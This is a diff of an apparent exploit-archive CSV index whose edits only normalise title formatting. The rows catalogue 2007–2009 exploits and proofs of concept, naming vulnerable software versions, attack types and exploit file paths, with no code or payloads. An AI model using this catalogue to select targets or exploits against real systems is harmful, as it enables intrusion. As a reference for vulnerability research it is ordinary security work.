4446,platforms/php/webapps/4446.txt,"Wordsmith 1.1b - (config.inc.php _path) Remote File Inclusion",2007-09-23,ShockShadow,php,webapps,0 4447,platforms/php/webapps/4447.txt,"PHP-Nuke addon Nuke Mobile Entartainment 1.0 - LFI",2007-09-23,"BorN To K!LL",php,webapps,0 -4448,platforms/php/webapps/4448.txt,"helplink 0.1.0 - (show.php file) Remote File Inclusion",2007-09-23,GoLd_M,php,webapps,0 +4448,platforms/php/webapps/4448.txt,"helplink 0.1.0 - (show.php) Remote File Inclusion",2007-09-23,GoLd_M,php,webapps,0 4449,platforms/php/webapps/4449.txt,"phpFullAnnu (PFA) 6.0 - Remote SQL Injection",2007-09-23,IHTeam,php,webapps,0 4450,platforms/windows/remote/4450.py,"Xitami Web Server 2.5 - (If-Modified-Since) Remote BoF Exploit (0Day)",2007-09-24,h07,windows,remote,80 4451,platforms/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusion Vulnerabilities",2007-09-24,BiNgZa,php,webapps,0 @@ -4176,7 +4176,7 @@ id,file,description,date,author,platform,type,port 4528,platforms/php/webapps/4528.txt,"KwsPHP 1.0 mg2 Module Remote SQL Injection",2007-10-13,"Mehmet Ince",php,webapps,0 4529,platforms/cgi/webapps/4529.txt,"WWWISIS <= 7.1 - (IsisScript) Local File Disclosure / XSS Vulnerabilities",2007-10-13,JosS,cgi,webapps,0 4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure Exploit",2007-10-14,eliteboy,multiple,remote,0 -4531,platforms/windows/local/4531.py,"jetAudio 7.x - (m3u File) Local SEH Overwrite Exploit",2007-10-14,h07,windows,local,0 +4531,platforms/windows/local/4531.py,"jetAudio 7.x - (m3u) Local SEH Overwrite Exploit",2007-10-14,h07,windows,local,0 4532,platforms/linux/dos/4532.pl,"eXtremail <= 2.1.1 memmove() Remote Denial of Service Exploit",2007-10-15,mu-b,linux,dos,0 4533,platforms/linux/remote/4533.c,"eXtremail <= 2.1.1 - (LOGIN) Remote Stack Overflow Exploit",2007-10-15,mu-b,linux,remote,4501 4534,platforms/linux/remote/4534.c,"eXtremail <= 2.1.1 PLAIN authentication Remote Stack Overflow Exploit",2007-10-15,mu-b,linux,remote,143 @@ -4225,10 +4225,10 @@ id,file,description,date,author,platform,type,port 4577,platforms/php/webapps/4577.txt,"CaupoShop Pro 2.x - (action) Remote File Inclusion",2007-10-28,mozi,php,webapps,0 4578,platforms/asp/webapps/4578.txt,"emagiC CMS.Net 4.0 - (emc.asp) Remote SQL Injection",2007-10-28,hak3r-b0y,asp,webapps,0 4579,platforms/windows/remote/4579.html,"GOM Player 2.1.6.3499 - (GomWeb3.dll 1.0.0.12) Remote Overflow Exploit",2007-10-29,rgod,windows,remote,0 -4580,platforms/php/webapps/4580.txt,"FireConfig 0.5 - (dl.php file) Remote File Disclosure",2007-10-28,GoLd_M,php,webapps,0 +4580,platforms/php/webapps/4580.txt,"FireConfig 0.5 - (dl.php) Remote File Disclosure",2007-10-28,GoLd_M,php,webapps,0 4581,platforms/php/webapps/4581.txt,"Sige 0.1 sige_init.php Remote File Inclusion",2007-10-28,GoLd_M,php,webapps,0 4582,platforms/php/webapps/4582.txt,"teatro 1.6 - (basePath) Remote File Include",2007-10-28,"Alkomandoz Hacker",php,webapps,0 -4583,platforms/windows/local/4583.py,"Sony CONNECT Player 4.x - (m3u File) Local Stack Overflow Exploit",2007-10-29,TaMBaRuS,windows,local,0 +4583,platforms/windows/local/4583.py,"Sony CONNECT Player 4.x - (.m3u) Local Stack Overflow Exploit",2007-10-29,TaMBaRuS,windows,local,0 4584,platforms/windows/local/4584.c,"Kodak Image Viewer - TIF/TIFF Code Execution Exploit PoC (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0 4585,platforms/php/webapps/4585.txt,"MySpace Resource Script (MSRS) 1.21 - RFI",2007-10-29,r00t@zapak.com,php,webapps,0 4586,platforms/php/webapps/4586.txt,"ProfileCMS 1.0 - Remote File Upload Shell Upload Exploit",2007-10-29,r00t@zapak.com,php,webapps,0 @@ -4646,7 +4646,7 @@ id,file,description,date,author,platform,type,port 5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - (disp.php) Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0 5004,platforms/windows/local/5004.c,"Safenet IPSecDrv.sys <= 10.4.0.12 - Local kernel ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0 5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - (ChilkatCert.dll) Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0 -5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - (parser.php file) Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0 +5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - (parser.php) Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0 5007,platforms/php/webapps/5007.txt,"Mambo Component Newsletter (listid) Remote SQL Injection",2008-01-29,S@BUN,php,webapps,0 5008,platforms/php/webapps/5008.txt,"Mambo Component Fq (listid) Remote SQL Injection",2008-01-29,S@BUN,php,webapps,0 5009,platforms/php/webapps/5009.txt,"Mambo Component MaMML (listid) Remote SQL Injection",2008-01-29,S@BUN,php,webapps,0 @@ -5032,7 +5032,7 @@ id,file,description,date,author,platform,type,port 5396,platforms/windows/dos/5396.txt,"hp openview nnm 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - (NeffyLauncher.dll) Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0 5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport FileTransfer ActiveX BoF Exploit",2008-04-07,"Patrick Webster",windows,remote,0 -5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - (viewsource.php file) File Disclosure",2008-04-07,Stack,php,webapps,0 +5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - (viewsource.php) File Disclosure",2008-04-07,Stack,php,webapps,0 5400,platforms/php/webapps/5400.txt,"724CMS <= 4.01 Enterprise (index.php ID) SQL Injection",2008-04-07,Lidloses_Auge,php,webapps,0 5401,platforms/php/webapps/5401.txt,"My Gaming Ladder <= 7.5 - (ladderid) SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 5402,platforms/php/webapps/5402.txt,"iScripts SocialWare (id) Remote SQL Injection Vulnerbility",2008-04-07,t0pP8uZz,php,webapps,0 @@ -5719,7 +5719,7 @@ id,file,description,date,author,platform,type,port 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow PoC",2008-07-21,"Guido Landi",windows,dos,0 6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0 6105,platforms/asp/webapps/6105.pl,"HRS Multi - (picture_pic_bv.asp key) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0 -6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 - (map file) Local Arbitrary Code Execution Exploit (Perl)",2008-07-21,"Guido Landi",windows,local,0 +6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 - (.map) Local Arbitrary Code Execution Exploit (Perl)",2008-07-21,"Guido Landi",windows,local,0 6107,platforms/php/webapps/6107.txt,"Interact E-Learning System 2.4.1 - (help.php) LFI Vulnerabilities",2008-07-21,DSecRG,php,webapps,0 6108,platforms/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Remote Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0 6109,platforms/cgi/webapps/6109.pl,"MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0 @@ -5909,17 +5909,17 @@ id,file,description,date,author,platform,type,port 6319,platforms/windows/dos/6319.html,"Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit",2008-08-27,shinnai,windows,dos,0 6320,platforms/php/webapps/6320.txt,"phpMyRealty <= 1.0.9 - Multiple Remote SQL Injection Vulnerabilities",2008-08-27,~!Dok_tOR!~,php,webapps,0 6321,platforms/php/webapps/6321.txt,"YourOwnBux 3.1 / 3.2 Beta - Remote SQL Injection",2008-08-27,~!Dok_tOR!~,php,webapps,0 -6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft <= 4.2 Build 98 - (mx4 file) Local BoF Exploit",2008-08-28,Koshi,windows,local,0 +6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft <= 4.2 Build 98 - (mx4) Local BoF Exploit",2008-08-28,Koshi,windows,local,0 6323,platforms/windows/remote/6323.html,"Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BoF Exploit",2008-08-28,spdr,windows,remote,0 6324,platforms/windows/remote/6324.html,"Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit",2008-08-28,spdr,windows,remote,0 6325,platforms/php/webapps/6325.php,"Invision Power Board <= 2.3.5 - Multiple Vulnerabilities (2)",2008-08-29,DarkFig,php,webapps,0 6326,platforms/windows/dos/6326.html,"LogMeIn Remote Access Utility ActiveX Memory Corruption DoS",2008-08-29,"YAG KOHHA",windows,dos,0 6327,platforms/windows/dos/6327.html,"Najdi.si Toolbar ActiveX Remote Buffer Overflow PoC",2008-08-29,shinnai,windows,dos,0 6328,platforms/solaris/remote/6328.c,"Sun Solaris <= 10 snoop(1M) Utility Remote Exploit",2008-08-29,Andi,solaris,remote,0 -6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - (asx file) Local BoF Exploit",2008-08-29,Koshi,windows,local,0 +6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - (.asx) Local BoF Exploit",2008-08-29,Koshi,windows,local,0 6330,platforms/windows/dos/6330.txt,"Micrsoft Windows GDI - (CreateDIBPatternBrushPt) Heap Overflow PoC",2008-08-29,Ac!dDrop,windows,dos,0 6332,platforms/php/webapps/6332.txt,"brim 2.0.0 - (SQL/XSS) Multiple Vulnerabilities",2008-08-30,InjEctOr5,php,webapps,0 -6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - (bcproj file) Local BoF Exploit",2008-08-30,Koshi,windows,local,0 +6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - (.bcproj) Local BoF Exploit",2008-08-30,Koshi,windows,local,0 6334,platforms/windows/remote/6334.html,"Friendly Technologies Read/Write Registry/Read Files Exploit",2008-08-30,spdr,windows,remote,0 6335,platforms/php/webapps/6335.txt,"Web Directory Script 1.5.3 - (site) SQL Injection",2008-08-31,"Hussin X",php,webapps,0 6336,platforms/php/webapps/6336.txt,"Words tag script 1.2 - (word) Remote SQL Injection",2008-08-31,"Hussin X",php,webapps,0 @@ -6187,7 +6187,7 @@ id,file,description,date,author,platform,type,port 6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining (news_read.php id) SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0 6614,platforms/windows/dos/6614.html,"Mozilla Firefox 3.0.3 User Interface Null Pointer Dereference Crash",2008-09-28,"Aditya K Sood",windows,dos,0 6615,platforms/windows/dos/6615.html,"Opera 9.52 Window Object Suppressing Remote Denial of Service Exploit",2008-09-28,"Aditya K Sood",windows,dos,0 -6616,platforms/windows/dos/6616.txt,"Microsoft Windows Explorer - (.zip File) Denial of Service Exploit",2008-09-28,"fl0 fl0w",windows,dos,0 +6616,platforms/windows/dos/6616.txt,"Microsoft Windows Explorer - (.zip) Denial of Service Exploit",2008-09-28,"fl0 fl0w",windows,dos,0 6617,platforms/php/webapps/6617.txt,"BbZL.PhP 0.92 - (lien_2) Local Directory Traversal",2008-09-28,JIKO,php,webapps,0 6618,platforms/php/webapps/6618.txt,"joomla component imagebrowser <= 0.1.5 rc2 - Directory Traversal",2008-09-28,Cr@zy_King,php,webapps,0 6619,platforms/windows/dos/6619.html,"Microsoft Internet Explorer GDI+ - Proof of Concept (MS08-052)",2008-09-28,"John Smith",windows,dos,0 @@ -6274,7 +6274,7 @@ id,file,description,date,author,platform,type,port 6703,platforms/php/webapps/6703.txt,"WebBiscuits Modules Controller <= 1.1 - (RFI/RFD) Remote Vulnerabilities",2008-10-08,GoLd_M,php,webapps,0 6704,platforms/linux/dos/6704.txt,"Konqueror 3.5.9 - (color/bgcolor) Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",linux,dos,0 6705,platforms/windows/local/6705.txt,"Microsoft Windows 2003 - Token Kidnapping Local Exploit PoC",2008-10-08,"Cesar Cerrudo",windows,local,0 -6706,platforms/php/webapps/6706.php,"Kusaba <= 1.0.4 - Remote Code Execution Exploit",2008-10-09,Sausage,php,webapps,0 +6706,platforms/php/webapps/6706.php,"Kusaba <= 1.0.4 - Remote Code Execution Exploit (1)",2008-10-09,Sausage,php,webapps,0 6707,platforms/php/webapps/6707.txt,"Gforge <= 4.5.19 - Multiple Remote SQL Injection Vulnerabilities",2008-10-09,beford,php,webapps,0 6708,platforms/php/webapps/6708.txt,"Gforge <= 4.6 rc1 - (skill_edit) SQL Injection",2008-10-09,beford,php,webapps,0 6709,platforms/php/webapps/6709.txt,"Joomla Component Joomtracker 1.01 - Remote SQL Injection",2008-10-09,rsauron,php,webapps,0 @@ -6842,7 +6842,7 @@ id,file,description,date,author,platform,type,port 7294,platforms/php/webapps/7294.pl,"Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit",2008-11-29,"CWH Underground",php,webapps,0 7295,platforms/asp/webapps/7295.txt,"Active Test 2.1 - (QuizID) Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7296,platforms/windows/dos/7296.txt,"Itunes 8.0.2.20/Quicktime 7.5.5 - (.mov) Multiple Off By Overflow PoC",2008-11-30,"laurent gaffié ",windows,dos,0 -7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 - (rdp file) Buffer Overflow PoC",2008-11-30,"Encrypt3d.M!nd ",windows,dos,0 +7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 - (.rdp) Buffer Overflow PoC",2008-11-30,"Encrypt3d.M!nd ",windows,dos,0 7298,platforms/php/webapps/7298.txt,"Active Web Helpdesk 2 - (CategoryID) Blind SQL Injection",2008-11-30,Cyber-Zone,php,webapps,0 7299,platforms/php/webapps/7299.txt,"Active Photo Gallery 6.2 - (Auth Bypass) SQL Injection",2008-11-30,R3d-D3V!L,php,webapps,0 7301,platforms/php/webapps/7301.txt,"Active Time Billing 3.2 - (Auth Bypass) SQL Injection",2008-11-30,AlpHaNiX,php,webapps,0 @@ -6851,7 +6851,7 @@ id,file,description,date,author,platform,type,port 7304,platforms/php/webapps/7304.pl,"KTP Computer Customer Database CMS 1.0 - Local File Inclusion",2008-11-30,"CWH Underground",php,webapps,0 7305,platforms/php/webapps/7305.txt,"KTP Computer Customer Database CMS 1.0 - Blind SQL Injection",2008-11-30,"CWH Underground",php,webapps,0 7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 - (SQL/fu/bypass) Multiple Vulnerabilities",2008-11-30,NoGe,php,webapps,0 -7307,platforms/windows/dos/7307.txt,"Electronics Workbench (EWB File) Local Stack Overflow PoC",2008-11-30,Zigma,windows,dos,0 +7307,platforms/windows/dos/7307.txt,"Electronics Workbench (.EWB) Local Stack Overflow PoC",2008-11-30,Zigma,windows,dos,0 7308,platforms/php/webapps/7308.txt,"cpCommerce 1.2.6 - (URL Rewrite) Input variable overwrite / Auth bypass",2008-11-30,girex,php,webapps,0 7309,platforms/windows/local/7309.pl,"Cain & Abel <= 4.9.24 - (.rdp) Stack Overflow Exploit",2008-11-30,SkD,windows,local,0 7310,platforms/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusion Vulnerabilities",2008-11-30,NoGe,php,webapps,0 @@ -6871,7 +6871,7 @@ id,file,description,date,author,platform,type,port 7326,platforms/asp/webapps/7326.txt,"Gallery MX 2.0.0 - (pics_pre.asp ID) Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0 7327,platforms/asp/webapps/7327.txt,"Calendar MX Professional 2.0.0 - Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0 7328,platforms/php/webapps/7328.pl,"Check New 4.52 - (findoffice.php search) Remote SQL Injection Exploit",2008-12-03,"CWH Underground",php,webapps,0 -7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 - (rdp file) Buffer Overflow Exploit",2008-12-03,"Encrypt3d.M!nd ",windows,local,0 +7329,platforms/windows/local/7329.py,"Cain & Abel 4.9.23 - (.rdp) Buffer Overflow Exploit",2008-12-03,"Encrypt3d.M!nd ",windows,local,0 7330,platforms/multiple/dos/7330.c,"ClamAV < 0.94.2 - (JPEG Parsing) Recursive Stack Overflow PoC",2008-12-03,"ilja van sprundel",multiple,dos,0 7331,platforms/php/webapps/7331.pl,"Joomla Component com_jmovies 1.1 - (id) SQL Injection Exploit",2008-12-03,StAkeR,php,webapps,0 7332,platforms/php/webapps/7332.txt,"ASP User Engine .NET Remote Database Disclosure",2008-12-03,AlpHaNiX,php,webapps,0 @@ -6989,7 +6989,7 @@ id,file,description,date,author,platform,type,port 7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0 7446,platforms/asp/webapps/7446.txt,"ASPired2Quote (quote.mdb) Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0 7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System - (Auth Bypass) SQL Injection",2008-12-14,Pouya_Server,asp,webapps,0 -7448,platforms/php/webapps/7448.txt,"autositephp 2.0.3 - (LFI/CSRF/edit file) Multiple Vulnerabilities",2008-12-14,SirGod,php,webapps,0 +7448,platforms/php/webapps/7448.txt,"autositephp 2.0.3 - (LFI/CSRF/Edit file) Multiple Vulnerabilities",2008-12-14,SirGod,php,webapps,0 7449,platforms/php/webapps/7449.txt,"iyzi Forum 1.0b3 - (iyziforum.mdb) Database Disclosure",2008-12-14,"Ghost Hacker",php,webapps,0 7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum (CAForum.mdb) Database Disclosure",2008-12-14,"Ghost Hacker",asp,webapps,0 7451,platforms/php/webapps/7451.txt,"php weather 2.2.2 - (LFI/XSS) Multiple Vulnerabilities",2008-12-14,ahmadbady,php,webapps,0 @@ -7076,7 +7076,7 @@ id,file,description,date,author,platform,type,port 7533,platforms/windows/local/7533.txt,"PowerStrip <= 3.84 - (pstrip.sys) Privilege Escalation Exploit",2008-12-21,"NT Internals",windows,local,0 7534,platforms/asp/webapps/7534.txt,"Emefa Guestbook 3.0 - Remote Database Disclosure",2008-12-21,Cyber.Zer0,asp,webapps,0 7535,platforms/hardware/dos/7535.php,"Linksys Wireless ADSL Router (WAG54G v2) - httpd DoS Exploit",2008-12-21,r0ut3r,hardware,dos,0 -7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 - (Skin File) Local Buffer Overflow Exploit",2008-12-21,r0ut3r,windows,local,0 +7536,platforms/windows/local/7536.cpp,"CoolPlayer 2.19 - (.Skin) Local Buffer Overflow Exploit",2008-12-21,r0ut3r,windows,local,0 7537,platforms/php/webapps/7537.txt,"BLOG 1.55B (image_upload.php) Arbitrary File Upload",2008-12-21,Piker,php,webapps,0 7538,platforms/php/webapps/7538.txt,"Joomla Component com_hbssearch 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps,0 7539,platforms/php/webapps/7539.txt,"Joomla Component com_tophotelmodule 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps,0 @@ -7087,7 +7087,7 @@ id,file,description,date,author,platform,type,port 7544,platforms/php/webapps/7544.txt,"Pligg 9.9.5b (check_url.php url) Upload Shell/SQL Injection Exploit",2008-12-22,Ams,php,webapps,0 7545,platforms/php/webapps/7545.txt,"yourplace <= 1.0.2 - Multiple Vulnerabilities + RCE Exploit",2008-12-22,Osirys,php,webapps,0 7546,platforms/php/webapps/7546.txt,"Joomla Component Volunteer 2.0 - (job_id) SQL Injection",2008-12-22,boom3rang,php,webapps,0 -7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - (Skin File) Local Buffer Overflow Exploit (Python)",2008-12-22,"Encrypt3d.M!nd ",windows,local,0 +7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - (.Skin) Local Buffer Overflow Exploit (Python)",2008-12-22,"Encrypt3d.M!nd ",windows,local,0 7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 - (Forum) Remote Cookies Disclosure Exploit",2008-12-22,StAkeR,php,webapps,0 7549,platforms/php/webapps/7549.txt,"RoundCube Webmail <= 0.2-3 beta Code Execution",2008-12-22,"Jacobo Gimeno",php,webapps,0 7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - (pstopdf filter) Privilege Escalation Exploit",2008-12-22,"Jon Oberheide",multiple,local,0 @@ -7118,18 +7118,18 @@ id,file,description,date,author,platform,type,port 7575,platforms/php/webapps/7575.pl,"Joomla Component 5starhotels (id) SQL Injection Exploit",2008-12-24,EcHoLL,php,webapps,0 7576,platforms/php/webapps/7576.pl,"PHP-Fusion <= 7.0.2 - Remote Blind SQL Injection Exploit",2008-12-24,StAkeR,php,webapps,0 7577,platforms/windows/local/7577.pl,"Acoustica Mixcraft <= 4.2 - Universal Stack Overflow Exploit (SEH)",2008-12-24,SkD,windows,local,0 -7578,platforms/windows/dos/7578.pl,"SAWStudio 3.9i (prf File) Local Buffer Overflow PoC",2008-12-24,"Encrypt3d.M!nd ",windows,dos,0 +7578,platforms/windows/dos/7578.pl,"SAWStudio 3.9i - (.prf) Local Buffer Overflow PoC",2008-12-24,"Encrypt3d.M!nd ",windows,dos,0 7579,platforms/php/webapps/7579.txt,"ClaSS <= 0.8.60 - (export.php ftype) Local File Inclusion",2008-12-24,fuzion,php,webapps,0 7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 - (lang) Local File Inclusion",2008-12-24,fuzion,php,webapps,0 7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 - protosw kernel Local Privledge Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0 -7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - (MAP File) Local SEH Overwrite Exploit",2008-12-28,Cnaph,windows,local,0 +7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - (.MAP) Local SEH Overwrite Exploit",2008-12-28,Cnaph,windows,local,0 7583,platforms/windows/remote/7583.pl,"Microsoft Internet Explorer XML Parsing Buffer Overflow Exploit",2008-12-28,"Jeremy Brown",windows,remote,0 7584,platforms/windows/remote/7584.pl,"Amaya Web Browser <= 11.0.1 - Remote Buffer Overflow Exploit (vista)",2008-12-28,SkD,windows,remote,0 7585,platforms/windows/dos/7585.txt,"Microsoft Windows Media Player - (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffié ",windows,dos,0 7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 - (Auth Bypass) SQL Injection",2008-12-28,bizzit,php,webapps,0 7587,platforms/php/webapps/7587.txt,"Joomla Component PAX Gallery 0.1 - Blind SQL Injection",2008-12-28,XaDoS,php,webapps,0 7589,platforms/windows/dos/7589.pl,"BulletProof FTP Client - (.bps) Local Stack Overflow PoC",2008-12-28,Stack,windows,dos,0 -7592,platforms/windows/dos/7592.pl,"Hex Workshop 5.1.4 - (Color Mapping File) Local Buffer Overflow PoC",2008-12-28,"Encrypt3d.M!nd ",windows,dos,0 +7592,platforms/windows/dos/7592.pl,"Hex Workshop 5.1.4 - Color Mapping File Local Buffer Overflow PoC",2008-12-28,"Encrypt3d.M!nd ",windows,dos,0 7593,platforms/php/webapps/7593.pl,"DeluxeBB <= 1.2 - Remote Blind SQL Injection Exploit",2008-12-28,StAkeR,php,webapps,0 7594,platforms/windows/remote/7594.html,"Chilkat FTP ActiveX (SaveLastError) Insecure Method Exploit",2008-12-28,callAX,windows,remote,0 7595,platforms/php/webapps/7595.txt,"FubarForum 1.6 - Arbitrary Admin Bypass",2008-12-28,k3yv4n,php,webapps,0 @@ -7189,17 +7189,17 @@ id,file,description,date,author,platform,type,port 7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 - (.m3u) Local Buffer Overflow PoC",2009-01-02,"aBo MoHaMeD",windows,dos,0 7650,platforms/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection Exploit",2009-01-03,darkjoker,php,webapps,0 7651,platforms/windows/local/7651.py,"Destiny Media Player 1.61 - (.m3u) Local Stack Overflow Exploit",2009-01-03,His0k4,windows,local,0 -7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow PoC",2009-01-03,"Encrypt3d.M!nd ",windows,dos,0 +7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 - (.lst) Local Buffer Overflow PoC",2009-01-03,"Encrypt3d.M!nd ",windows,dos,0 7653,platforms/php/webapps/7653.txt,"Webspell 4 - (Auth Bypass) SQL Injection",2009-01-03,anonymous,php,webapps,0 -7654,platforms/windows/local/7654.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit",2009-01-04,"Encrypt3d.M!nd ",windows,local,0 -7655,platforms/windows/local/7655.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (2)",2009-01-04,sCORPINo,windows,local,0 -7656,platforms/windows/local/7656.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (3)",2009-01-04,Houssamix,windows,local,0 +7654,platforms/windows/local/7654.pl,"Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit",2009-01-04,"Encrypt3d.M!nd ",windows,local,0 +7655,platforms/windows/local/7655.pl,"Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (2)",2009-01-04,sCORPINo,windows,local,0 +7656,platforms/windows/local/7656.pl,"Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (3)",2009-01-04,Houssamix,windows,local,0 7657,platforms/php/webapps/7657.txt,"webSPELL <= 4.01.02 - (id) Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0 7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion Exploit",2009-01-04,StAkeR,php,webapps,0 7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - (search) Remote SQL Injection",2009-01-04,DaiMon,php,webapps,0 7660,platforms/php/webapps/7660.txt,"PhpMesFilms 1.0 - (index.php id) Remote SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0 -7661,platforms/windows/local/7661.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (4)",2009-01-04,Stack,windows,local,0 -7662,platforms/windows/local/7662.py,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (5)",2009-01-04,suN8Hclf,windows,local,0 +7661,platforms/windows/local/7661.pl,"Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (4)",2009-01-04,Stack,windows,local,0 +7662,platforms/windows/local/7662.py,"Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (5)",2009-01-04,suN8Hclf,windows,local,0 7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 - (id) Remote SQL Injection",2009-01-04,ZoRLu,php,webapps,0 7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 - (viewarticle.php id) Blind SQL Injection Exploit",2009-01-04,darkjoker,php,webapps,0 7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro - (acc.mdb) Database Disclosure",2009-01-05,ByALBAYX,asp,webapps,0 @@ -7232,7 +7232,7 @@ id,file,description,date,author,platform,type,port 7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - (PlaylistSkin) Buffer Overflow Exploit",2009-01-07,"Jeremy Brown",windows,local,0 7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - (user) Remote Buffer Overflow PoC",2009-01-07,Houssamix,windows,dos,0 7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - (.aup) Remote off by one Crash Exploit",2009-01-07,Stack,windows,dos,0 -7695,platforms/windows/local/7695.pl,"VUPlayer <= 2.49 - (.PLS) Universal Buffer Overflow Exploit",2009-01-07,SkD,windows,local,0 +7695,platforms/windows/local/7695.pl,"VUPlayer 2.49 - (.pls) Universal Buffer Overflow Exploit",2009-01-07,SkD,windows,local,0 7696,platforms/windows/dos/7696.pl,"WinAmp GEN_MSN Plugin - Heap Buffer Overflow PoC",2009-01-07,SkD,windows,dos,0 7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0 7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - (items.php CA) SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0 @@ -7276,7 +7276,7 @@ id,file,description,date,author,platform,type,port 7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart <= 6.0 - Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0 7737,platforms/windows/dos/7737.py,"Triologic Media Player 7 - (.m3u) Local Heap Buffer Overflow PoC",2009-01-12,zAx,windows,dos,0 7738,platforms/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - Remote SQL Injection",2009-01-12,seomafia,php,webapps,0 -7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - (Download File) Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0 